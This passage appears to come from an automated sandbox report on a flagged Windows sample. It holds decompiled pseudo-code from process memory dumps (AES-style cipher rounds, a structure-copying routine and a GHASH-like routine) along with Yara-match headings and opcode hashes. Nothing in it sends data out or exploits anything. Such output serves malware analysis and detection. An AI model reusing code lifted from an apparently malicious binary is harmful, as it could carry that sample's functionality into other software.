                    				intOrPtr _t369;
                    				unsigned int _t373;
                    				signed char _t379;
                    				unsigned int _t406;
                    				unsigned int _t422;
                    				unsigned int _t440;
                    				intOrPtr* _t478;
                    				unsigned int _t481;
                    				signed int _t485;
                    				unsigned int _t488;
                    				unsigned int _t489;
                    				unsigned int _t496;
                    				intOrPtr* _t506;
                    				unsigned int _t507;
                    				signed int _t509;
                    				unsigned int _t510;
                    				signed int* _t513;
                    				unsigned int _t515;
                    				unsigned int _t516;
                    				signed int _t518;
                    
                    				_t513 = __ecx;
                    				_t506 = __edx;
                    				_t222 =  *(__ecx + 0xf0) >> 1;
                    				_v36 = _t222;
                    				if(_t222 <= 7 && _t222 != 0) {
                    					_v16 = E105B30FD( *((intOrPtr*)(__edx + 4))) ^ _t513[1];
                    					_v12 = E105B30FD( *((intOrPtr*)(_t506 + 8))) ^ _t513[2];
                    					_v32 = E105B30FD( *((intOrPtr*)(_t506 + 0xc))) ^ _t513[3];
                    					_t229 = E105B30FD( *_t506);
                    					_t230 = E105B3211();
                    					_t507 = _v12;
                    					_t373 = _t229 ^  *_t513 | _t230;
                    					_t481 = _v32;
                    					_v24 =  *(0x462118 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t373 >> 0x18) * 4) ^  *(0x462518 + (_t481 & 0x000000ff) * 4) ^ _t513[4];
                    					_v20 =  *(0x462118 + (_t481 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v16 >> 0x18) * 4) ^  *(0x462518 + (_t373 & 0x000000ff) * 4) ^ _t513[5];
                    					_v8 =  *(0x461d18 + (_t481 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t507 >> 0x18) * 4);
                    					_v8 = _v8 ^  *(0x462118 + (_t373 >> 0x00000008 & 0x000000ff) * 4);
                    					_t406 = _v16;
                    					_t509 = _v8 ^  *(0x462518 + (_t406 & 0x000000ff) * 4);
                    					_v8 = _t509;
                    					_v8 = _t509 ^ _t513[6];
                    					_t485 =  *(0x461918 + (_t481 >> 0x18) * 4) ^  *(0x462118 + (_t406 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t373 >> 0x00000010 & 0x000000ff) * 4);
                    					_t510 = _v36;
                    					_t258 = _v12 & 0x000000ff;
                    					while(1) {
                    						_t487 = _t485 ^  *(0x462518 + _t258 * 4) ^ _t513[7];
                    						_t514 =  &(_t513[8]);
                    						_v16 =  &(_t513[8]);
                    						_v12 = _t485 ^  *(0x462518 + _t258 * 4) ^ _t513[7];
                    						_t510 = _t510 - 1;
                    						if(_t510 == 0) {
                    							break;
                    						}
                    						_t515 = _v8;
                    						_t488 = _v24;
                    						_v28 =  *(0x462118 + (_t515 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t488 >> 0x18) * 4) ^  *(0x462518 + (_v12 & 0x000000ff) * 4) ^  *_v16;
                    						_v32 =  *(0x462118 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t515 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v20 >> 0x18) * 4) ^  *(0x462518 + (_t488 & 0x000000ff) * 4) ^  *(_v16 + 4);
                    						_v12 = _v12 >> 0x18;
                    						_t516 = _v16;
                    						_t422 = _t488;
                    						_t489 = _v20;
                    						_t379 =  *(0x461d18 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t515 >> 0x18) * 4) ^  *(0x462118 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x462518 + (_t489 & 0x000000ff) * 4) ^  *(_t516 + 8);
                    						_t496 =  *(0x461918 + _v12 * 4) ^  *(0x462118 + (_t489 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x462518 + (_v8 & 0x000000ff) * 4) ^  *(_t516 + 0xc);
                    						_v24 =  *(0x462118 + (_t379 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v28 >> 0x18) * 4) ^  *(0x462518 + (_t496 & 0x000000ff) * 4) ^  *(_t516 + 0x10);
                    						_v20 =  *(0x462118 + (_t496 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t379 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v32 >> 0x18) * 4) ^  *(0x462518 + (_v28 & 0x000000ff) * 4) ^  *(_t516 + 0x14);
                    						_v8 =  *(0x461d18 + (_t496 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t379 >> 0x18) * 4);
                    						_v8 = _v8 ^  *(0x462118 + (_v28 >> 0x00000008 & 0x000000ff) * 4);
                    						_t440 = _v32;
                    						_t518 = _v8 ^  *(0x462518 + (_t440 & 0x000000ff) * 4);
                    						_v8 = _t518;
                    						_t513 = _v16;
                    						_v8 = _t518 ^ _t513[6];
                    						_t485 =  *(0x461918 + (_t496 >> 0x18) * 4) ^  *(0x462118 + (_t440 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v28 >> 0x00000010 & 0x000000ff) * 4);
                    						_t258 = _t379 & 0x000000ff;
                    					}
                    					_t338 = E105B30FD( *(0x462518 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t487 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x462118 + (_v20 >> 0x18) * 4) & 0xff000000 ^  *(0x461d18 + (_v24 & 0x000000ff) * 4) & 0x000000ff ^ _t514[1]);
                    					_t347 = E105B30FD( *(0x462118 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x462518 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_v24 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461d18 + (_v20 & 0x000000ff) * 4) & 0x000000ff ^ _t514[2]);
                    					_t356 = E105B30FD( *(0x462118 + (_v12 >> 0x18) * 4) & 0xff000000 ^  *(0x462518 + (_v24 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_v20 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461d18 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^ _t514[3]);
                    					_t369 = E105B30FD( *(0x461918 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x462518 + (_v20 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_v24 >> 0x18) * 4) & 0xff000000 ^  *(0x461d18 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_v16);
                    					_t478 = _a4;
                    					 *((intOrPtr*)(_t478 + 4)) = _t338;
                    					 *_t478 = _t369;
                    					 *((intOrPtr*)(_t478 + 8)) = _t347;
                    					 *((intOrPtr*)(_t478 + 0xc)) = _t356;
                    					return _t369;
                    				}
                    				return _t222;
                    			}
                    0x105b3235
                    0x105b3238
                    0x105b3240
                    0x105b3242
                    0x105b3248
                    0x105b3265
                    0x105b3273
                    0x105b3280
                    0x105b3283
                    0x105b328c
                    0x105b3291
                    0x105b3294
                    0x105b32ae
                    0x105b32d8
                    0x105b3316
                    0x105b332f
                    0x105b334b
                    0x105b334e
                    0x105b335a
                    0x105b3363
                    0x105b3369
                    0x105b337c
                    0x105b3386
                    0x105b3389
                    0x105b3588
                    0x105b358f
                    0x105b3592
                    0x105b3595
                    0x105b3598
                    0x105b359b
                    0x105b359e
                    0x00000000
                    0x00000000
                    0x105b3391
                    0x105b33ac
                    0x105b33da
                    0x105b341c
                    0x105b3421
                    0x105b342f
                    0x105b3439
                    0x105b343b
                    0x105b345d
                    0x105b348d
                    0x105b34c9
                    0x105b3511
                    0x105b352a
                    0x105b3547
                    0x105b354a
                    0x105b3556
                    0x105b355d
                    0x105b3562
                    0x105b3568
                    0x105b357e
                    0x105b3585
                    0x105b3585
                    0x105b35f9
                    0x105b3651
                    0x105b36ad
                    0x105b370b
                    0x105b3710
                    0x105b3713
                    0x105b3716
                    0x105b3718
                    0x105b371b
                    0x00000000
                    0x105b371e
                    0x105b3724

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8001e367c53f8ee38b432c69aa832e26edc9402d3f3a3057c2bcae96baadee62
                    • Instruction ID: a27cb4e4c96b9aee43569888ba7fdb0a781c881b5bb4f5ca7a4823568a9406a7
                    • Opcode Fuzzy Hash: 8001e367c53f8ee38b432c69aa832e26edc9402d3f3a3057c2bcae96baadee62
                    • Instruction Fuzzy Hash: 6DE1B070A10458AFCB08CF5DE8A287E73F1FB49300755816EE582E7391DA74FA12EB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 478658756e30f7f1ba970a92bd0e41a0f1cb0e3296731c86c1f7c4ea0a9e4636
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: F6C1B43220609349DF2D4639C4741BFBAA19ED67B1B1A275ED4B2CF2C4EF18E924D624
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction ID: 89fb698572b7cf86533d0eea82b05fcf403d339a8e9ac14319646ffa1aaa429a
                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction Fuzzy Hash: 67C1D8322060534ADF2D463984341BFBAA09EE57B1B1A276FD4B3CF2C4EF18E964D524
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 498841ff8ffc577a75ecd23afa02eae88d75307c74ebf78fc8dbafedbe6a6034
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: C7C1723230615349DB2D4A39843417FBAB19EE57B2B1A275FD4B2CF2C4EF28DA249614
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E105AA38F(intOrPtr* __ecx, intOrPtr* __edx, void* __esi) {
                    				intOrPtr* _v8;
                    				void* __edi;
                    				void* _t101;
                    				void* _t102;
                    				intOrPtr* _t220;
                    				signed int _t227;
                    				signed int _t232;
                    				signed int _t235;
                    				signed int _t240;
                    				signed int _t243;
                    				signed int _t246;
                    				signed int _t250;
                    				signed int _t253;
                    				signed int _t263;
                    				signed int _t273;
                    				signed int _t276;
                    				signed int _t279;
                    				signed int _t282;
                    				signed int _t285;
                    				signed int _t288;
                    				void* _t291;
                    				intOrPtr* _t294;
                    				void* _t299;
                    				signed int _t302;
                    				void* _t305;
                    
                    				_t299 = __esi;
                    				_push(__ecx);
                    				_t220 = __ecx;
                    				_t294 = __edx;
                    				_v8 = __edx;
                    				if(__ecx == 0 || __edx == 0 ||  *((intOrPtr*)(__ecx + 4)) == 0) {
                    					_t102 = 0xffffff53;
                    				} else {
                    					_t223 =  *__ecx;
                    					if( *__ecx != 0) {
                    						E105AD583(_t101, _t223, __edx, __esi);
                    					}
                    					_t102 = E105AA351(_t294, 1);
                    					if(_t102 >= 0) {
                    						 *_t220 = _t294;
                    						_push(_t299);
                    						 *((short*)(_t220 + 0x218)) =  *((intOrPtr*)( *_t294));
                    						_t4 = _t294 + 0x80; // 0x0
                    						 *((short*)(_t220 + 0x380)) =  *_t4;
                    						_t6 = _t294 + 0x7c; // 0x0
                    						 *((intOrPtr*)(_t220 + 0x36c)) =  *_t6;
                    						_t8 = _t294 + 0x84; // 0x0
                    						 *((intOrPtr*)(_t220 + 0x384)) =  *_t8;
                    						_t10 = _t294 + 0x78; // 0x0
                    						 *((intOrPtr*)(_t220 + 0x204)) =  *_t10;
                    						_t12 = _t294 + 0x74; // 0x0
                    						 *((intOrPtr*)(_t220 + 0x80)) =  *_t12;
                    						_t227 = ( *( *_t294 + 2) & 3) << 0x00000004 |  *(_t220 + 0x308) & 0x0000ffcf;
                    						 *(_t220 + 0x308) = _t227;
                    						_t302 = ( *( *_t294 + 3) & 1) << 0x0000000a | _t227 & 0x0000fbff;
                    						 *(_t220 + 0x308) = _t302;
                    						_t19 = _t294 + 0x60; // 0x69006c
                    						 *((char*)(_t220 + 0x315)) =  *_t19;
                    						_t21 = _t294 + 0x5e; // 0x6c0061
                    						_t273 = ( *_t21 >> 0x00000002 & 1) << 0x00000008 |  *(_t220 + 0x30a) & 0x0000feff;
                    						 *(_t220 + 0x30a) = _t273;
                    						_t24 = _t294 + 0x5e; // 0x6c0061
                    						_t232 = ( *_t24 >> 0x00000003 & 1) << 0x00000009 | _t273 & 0x0000fdff;
                    						 *(_t220 + 0x30a) = _t232;
                    						_t26 = _t294 + 0x5e; // 0x6c0061
                    						_t276 = ( *_t26 >> 0x00000004 & 1) << 0x0000000b | _t232 & 0x0000f7ff;
                    						 *(_t220 + 0x30a) = _t276;
                    						_t28 = _t294 + 0x5e; // 0x6c0061
                    						_t235 = ( *_t28 >> 0x00000001 & 1) << 0x00000007 | _t276 & 0x0000ff7f;
                    						 *(_t220 + 0x30a) = _t235;
                    						_t30 = _t294 + 0x5e; // 0x6c0061
                    						 *(_t220 + 0x30a) = ( *_t30 >> 0x00000005 & 1) << 0x0000000c | _t235 & 0x0000efff;
                    						_t32 = _t294 + 0x62; // 0x6e0069
                    						 *((short*)(_t220 + 0x31c)) =  *_t32;
                    						_t34 = _t294 + 0x64; // 0x67006e
                    						 *((short*)(_t220 + 0x31e)) =  *_t34;
                    						_t36 = _t294 + 0x66; // 0x2e0067
                    						 *((short*)(_t220 + 0x322)) =  *_t36;
                    						_t38 = _t294 + 0x5d; // 0x6c006100
                    						_t279 = ( *_t38 >> 0x00000004 & 1) << 0x00000002 | _t302 & 0x0000fffb;
                    						 *(_t220 + 0x308) = _t279;
                    						_t40 = _t294 + 0x5d; // 0x6c006100
                    						_t240 = ( *_t40 >> 0x00000005 & 1) << 0x00000003 | _t279 & 0x0000fff7;
                    						 *(_t220 + 0x308) = _t240;
                    						_t42 = _t294 + 0x5d; // 0x6c006100
                    						_t282 = ( *_t42 & 1) << 0x00000006 | _t240 & 0x0000ffbf;
                    						 *(_t220 + 0x308) = _t282;
                    						_t44 = _t294 + 0x5d; // 0x6c006100
                    						_t243 = ( *_t44 >> 0x00000001 & 1) << 0x00000007 | _t282 & 0x0000ff7f;
                    						 *(_t220 + 0x308) = _t243;
                    						_t46 = _t294 + 0x5d; // 0x6c006100
                    						_t285 = ( *_t46 >> 0x00000002 & 1) << 0x00000008 | _t243 & 0x0000feff;
                    						 *(_t220 + 0x308) = _t285;
                    						_t48 = _t294 + 0x5d; // 0x6c006100
                    						_t246 = ( *_t48 >> 0x00000003 & 1) << 0x00000009 | _t285 & 0x0000fdff;
                    						 *(_t220 + 0x308) = _t246;
                    						_t50 = _t294 + 0x5d; // 0x6c006100
                    						 *(_t220 + 0x308) =  *_t50 >> 0x00000006 & 0x000000ff | _t246 & 0x0000fffc;
                    						_t52 = _t294 + 0x5e; // 0x6c0061
                    						_t250 = ( *_t52 >> 0x00000006 & 1) << 0x00000003 |  *(_t220 + 0x30c) & 0x0000fff7;
                    						 *(_t220 + 0x30c) = _t250;
                    						_t55 = _t294 + 0x5e; // 0x6c0061
                    						_t288 = ( *_t55 >> 0x00000007 & 0x000000ff) << 0x00000004 | _t250 & 0x0000ffef;
                    						 *(_t220 + 0x30c) = _t288;
                    						_t57 = _t294 + 0x5f; // 0x69006c00
                    						_t253 = ( *_t57 & 1) << 0x00000006 | _t288 & 0x0000ffbf;
                    						 *(_t220 + 0x30c) = _t253;
                    						_t291 = 1;
                    						_t59 = _t294 + 0x61; // 0x6e006900
                    						 *(_t220 + 0x30c) = ( *_t59 >> 0x00000005 & 1) << 0x0000000f | _t253 & 0x00007fff;
                    						_t61 = _t294 + 0x24; // 0x10000
                    						 *((intOrPtr*)(_t220 + 0x124)) =  *_t61;
                    						 *((intOrPtr*)(_t220 + 0x128)) =  *((intOrPtr*)(_t294 + 0x28));
                    						_t65 = _t294 + 0x2c; // 0x3a0043
                    						 *((intOrPtr*)(_t220 + 0x12c)) =  *_t65;
                    						_t67 = _t294 + 0x30; // 0x57005c
                    						 *((intOrPtr*)(_t220 + 0x130)) =  *_t67;
                    						_t69 = _t294 + 0x34; // 0x6e0069
                    						 *((intOrPtr*)(_t220 + 0x148)) =  *_t69;
                    						_t71 = _t294 + 0x38; // 0x6f0064
                    						 *((intOrPtr*)(_t220 + 0x15c)) =  *_t71;
                    						_t73 = _t294 + 0x3c; // 0x730077
                    						 *((intOrPtr*)(_t220 + 0x160)) =  *_t73;
                    						_t75 = _t294 + 0x40; // 0x53005c
                    						 *((intOrPtr*)(_t220 + 0x14c)) =  *_t75;
                    						_t78 = _t294 + 0x44; // 0x730079
                    						 *(_t220 + 0x150) =  *(_t220 + 0x150) ^ ( *(_t220 + 0x150) ^  *_t78) & 0x0000007f;
                    						_t81 = _t294 + 0x44; // 0x730079
                    						_t83 = _t294 + 0x44; // 0x730079
                    						 *(_t220 + 0x150) = ( *_t81 ^  *(_t220 + 0x150)) & 0x0000007f ^  *_t83;
                    						_t85 = _t294 + 0x48; // 0x4f0057
                    						 *((intOrPtr*)(_t220 + 0x154)) =  *_t85;
                    						_t87 = _t294 + 0x4c; // 0x360057
                    						 *((intOrPtr*)(_t220 + 0x158)) =  *_t87;
                    						_t89 = _t294 + 0x54; // 0x700044
                    						_t305 =  *_t89;
                    						if(_t305 == 0) {
                    							E105C2D6E(_t294,  *(_t220 + 4), 0, 0x158);
                    							_t291 = 1;
                    						} else {
                    							_t263 = 0x56;
                    							memcpy( *(_t220 + 4), _t305, _t263 << 2);
                    							_t294 = _v8;
                    						}
                    						if(( *(_t220 + 0x308) & 0x00000030) != 0x30) {
                    							_t291 = E105AA2E1(_t220);
                    						}
                    						_t95 = _t294 + 0x6c; // 0x650078
                    						_t102 = _t291;
                    						 *((intOrPtr*)(_t220 + 0x88)) =  *_t95;
                    						_t97 = _t294 + 0x70; // 0x0
                    						 *((intOrPtr*)(_t220 + 0x8c)) =  *_t97;
                    						_t99 = _t294 + 0x5c; // 0x610063
                    						 *((char*)(_t220 + 0x20e)) =  *_t99;
                    					}
                    				}
                    				return _t102;
                    			}
                    0x105aa38f
                    0x105aa392
                    0x105aa395
                    0x105aa397
                    0x105aa399
                    0x105aa39e
                    0x105aa77f
                    0x105aa3b6
                    0x105aa3b6
                    0x105aa3ba
                    0x105aa3bc
                    0x105aa3bc
                    0x105aa3c6
                    0x105aa3cd
                    0x105aa3d3
                    0x105aa3dc
                    0x105aa3e0
                    0x105aa3e7
                    0x105aa3ee
                    0x105aa3f5
                    0x105aa3f8
                    0x105aa3fe
                    0x105aa404
                    0x105aa40a
                    0x105aa40d
                    0x105aa413
                    0x105aa416
                    0x105aa434
                    0x105aa439
                    0x105aa455
                    0x105aa458
                    0x105aa45f
                    0x105aa462
                    0x105aa468
                    0x105aa489
                    0x105aa48c
                    0x105aa499
                    0x105aa4ab
                    0x105aa4ae
                    0x105aa4bb
                    0x105aa4cd
                    0x105aa4d0
                    0x105aa4dd
                    0x105aa4ee
                    0x105aa4f1
                    0x105aa4f8
                    0x105aa516
                    0x105aa51f
                    0x105aa524
                    0x105aa52b
                    0x105aa52f
                    0x105aa536
                    0x105aa53a
                    0x105aa541
                    0x105aa553
                    0x105aa55b
                    0x105aa564
                    0x105aa576
                    0x105aa579
                    0x105aa586
                    0x105aa595
                    0x105aa598
                    0x105aa5a5
                    0x105aa5b6
                    0x105aa5b9
                    0x105aa5c6
                    0x105aa5d8
                    0x105aa5db
                    0x105aa5e8
                    0x105aa5fa
                    0x105aa5fd
                    0x105aa60a
                    0x105aa616
                    0x105aa61d
                    0x105aa636
                    0x105aa639
                    0x105aa640
                    0x105aa656
                    0x105aa659
                    0x105aa666
                    0x105aa675
                    0x105aa67a
                    0x105aa681
                    0x105aa682
                    0x105aa69a
                    0x105aa6a1
                    0x105aa6a4
                    0x105aa6ad
                    0x105aa6b3
                    0x105aa6b6
                    0x105aa6bc
                    0x105aa6bf
                    0x105aa6c5
                    0x105aa6c8
                    0x105aa6ce
                    0x105aa6d1
                    0x105aa6d7
                    0x105aa6da
                    0x105aa6e0
                    0x105aa6e3
                    0x105aa6ef
                    0x105aa6f4
                    0x105aa6fa
                    0x105aa706
                    0x105aa709
                    0x105aa70f
                    0x105aa712
                    0x105aa718
                    0x105aa71b
                    0x105aa721
                    0x105aa721
                    0x105aa726
                    0x105aa73f
                    0x105aa749
                    0x105aa728
                    0x105aa72d
                    0x105aa72e
                    0x105aa730
                    0x105aa730
                    0x105aa755
                    0x105aa75e
                    0x105aa75e
                    0x105aa760
                    0x105aa763
                    0x105aa765
                    0x105aa76b
                    0x105aa76e
                    0x105aa774
                    0x105aa777
                    0x105aa777
                    0x105aa3cd
                    0x105aa789

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75bcb6980a201f2a5bc31736a7ab49307c6c83ed7787d014a64e3337eb0cdef7
                    • Instruction ID: 3d29b3e44f190215b20092cd88e611e53d59491e18ac6e4cd88c6401b52a7bbd
                    • Opcode Fuzzy Hash: 75bcb6980a201f2a5bc31736a7ab49307c6c83ed7787d014a64e3337eb0cdef7
                    • Instruction Fuzzy Hash: 26B18229115A939ACB01EF29C0913F17BA1EF6A304F1890B9DC9CCFB57E7256412EB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
                    • Instruction ID: b026397cdc5a2788a8846e4ec5f60ec3cbb44c94b97407c66bc8dff9a88f8d49
                    • Opcode Fuzzy Hash: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
                    • Instruction Fuzzy Hash: F6B18179524A929AC701AF29C0A13F17BA1FF6A304F1850B9DC98CFB57E3295412EB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                    • Instruction ID: b367387755e38c2acd2464c16e73056793f51d4de4b8bca9bcadcc32440fe761
                    • Opcode Fuzzy Hash: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                    • Instruction Fuzzy Hash: 84615B7120070A77DE389A2888927BFE3949B6D304F14391FF942DB781EE1DDD42825E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 734bcd308261c39c15bc3b1bbc171b3f1001009be4a085e5c990ae6d9ed5feda
                    • Instruction ID: 16784fe19e2edb84f1e2eabff14cd8590e9d4ff84b89519e55d6fc4a3164caeb
                    • Opcode Fuzzy Hash: 734bcd308261c39c15bc3b1bbc171b3f1001009be4a085e5c990ae6d9ed5feda
                    • Instruction Fuzzy Hash: A251047120074456DF3C49688956BBFE3A59B1E344F19390FF9828B382CE4D9D4A925E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E105B3F06(void* __ecx, signed int __edx, signed int _a4, void* _a8, unsigned int _a12, void* _a16, int _a20) {
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				char _v64;
                    				unsigned int _t115;
                    				signed int _t146;
                    				unsigned int _t147;
                    				unsigned int _t149;
                    				unsigned int _t150;
                    				signed int* _t156;
                    				signed int _t160;
                    				signed int _t169;
                    				signed int _t179;
                    
                    				_v12 = __edx;
                    				asm("xorps xmm0, xmm0");
                    				asm("movsd");
                    				asm("movlpd [ebp-0x1c], xmm0");
                    				asm("movlpd [ebp-0x14], xmm0");
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				E105B316D( &_v64,  &_v64);
                    				_t146 = _a4;
                    				if(_t146 == 0) {
                    					L7:
                    					_t147 = _a12;
                    					if(_t147 == 0) {
                    						L15:
                    						_t179 = _a4;
                    						_v28 = _v28 ^ (0 << 0x00000020 | _t179) << 0x3;
                    						_v20 = _v20 ^ (0 << 0x00000020 | _t147) << 0x3;
                    						_t156 =  &_v32;
                    						_v32 = _v32 ^ _t179 << 0x00000003;
                    						_v24 = _v24 ^ _t147 << 0x00000003;
                    						E105B3DC3(_t156,  &_v64);
                    						_push(_t156);
                    						E105B316D( &_v32,  &_v32);
                    						return E105C334E(_a16,  &_v32, _a20);
                    					}
                    					_t183 = _a8;
                    					if(_a8 == 0) {
                    						goto L15;
                    					}
                    					_t160 = _t147 & 0x0000000f;
                    					_t115 = _t147 >> 4;
                    					_v12 = _t160;
                    					if(_t115 == 0) {
                    						L13:
                    						if(_t160 != 0) {
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							E105C334E( &_v48, _t183, _t160);
                    							E105B316D( &_v48,  &_v48);
                    							_v32 = _v32 ^ _v48;
                    							_v28 = _v28 ^ _v44;
                    							_v24 = _v24 ^ _v40;
                    							_v20 = _v20 ^ _v36;
                    							E105B3DC3( &_v32,  &_v64);
                    						}
                    						goto L15;
                    					}
                    					_t149 = _t115;
                    					do {
                    						_push(_t160);
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						E105B316D( &_v48,  &_v48);
                    						_v32 = _v32 ^ _v48;
                    						_v28 = _v28 ^ _v44;
                    						_v24 = _v24 ^ _v40;
                    						_v20 = _v20 ^ _v36;
                    						_t160 =  &_v32;
                    						E105B3DC3(_t160,  &_v64);
                    						_t183 = _a8 + 0x10;
                    						_a8 = _a8 + 0x10;
                    						_t149 = _t149 - 1;
                    					} while (_t149 != 0);
                    					_t147 = _a12;
                    					_t160 = _v12;
                    					goto L13;
                    				}
                    				_t189 = _v12;
                    				if(_v12 == 0) {
                    					goto L7;
                    				}
                    				_t150 = _t146 >> 4;
                    				_t169 = _t146 & 0x0000000f;
                    				_v16 = _t169;
                    				if(_t150 == 0) {
                    					L5:
                    					if(_t169 != 0) {
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						E105C334E( &_v48, _t189, _t169);
                    						E105B316D( &_v48,  &_v48);
                    						_v32 = _v32 ^ _v48;
                    						_v28 = _v28 ^ _v44;
                    						_v24 = _v24 ^ _v40;
                    						_v20 = _v20 ^ _v36;
                    						E105B3DC3( &_v32,  &_v64);
                    					}
                    					goto L7;
                    				} else {
                    					goto L3;
                    				}
                    				goto L5;
                    				L3:
                    				_push(_t169);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				E105B316D( &_v48,  &_v48);
                    				_v32 = _v32 ^ _v48;
                    				_v28 = _v28 ^ _v44;
                    				_v24 = _v24 ^ _v40;
                    				_v20 = _v20 ^ _v36;
                    				_t169 =  &_v32;
                    				E105B3DC3(_t169,  &_v64);
                    				_t189 = _v12 + 0x10;
                    				_v12 = _v12 + 0x10;
                    				_t150 = _t150 - 1;
